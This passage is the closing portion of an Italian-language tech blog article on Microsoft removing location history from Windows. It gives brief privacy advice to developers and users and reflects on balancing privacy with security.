Microsoft consiglia agli sviluppatori di rivedere le proprie applicazioni e migrare verso nuove soluzioni che non dipendano dalla funzione obsoleta. Per gli utenti, invece, il consiglio è:

1. Disattivare i servizi di localizzazione nelle impostazioni di Windows se non necessari.
2. Cliccare su “Clear” per cancellare eventuali dati di posizione registrati nelle ultime 24 ore.

Privacy o limitazione della sicurezza?

Se da una parte Microsoft si allinea alla crescente richiesta di maggiore privacy e controllo sui dati, dall’altra questa rimozione potrebbe creare disagi a chi sfruttava la cronologia delle posizioni per funzioni avanzate, costringendo sviluppatori e aziende a ripensare le proprie strategie. Sarà interessante vedere quali soluzioni alternative emergeranno per colmare questo vuoto.

In un mondo digitale sempre più complesso e minaccioso, la vera sfida sarà trovare il giusto equilibrio tra tutela della privacy e capacità di difesa dalle minacce informatiche, senza compromettere né la sicurezza né l’innovazione.

L'articolo Microsoft elimina la cronologia delle posizioni su Windows. Scelta di privacy o rischio sicurezza? proviene da il blog della sicurezza informatica.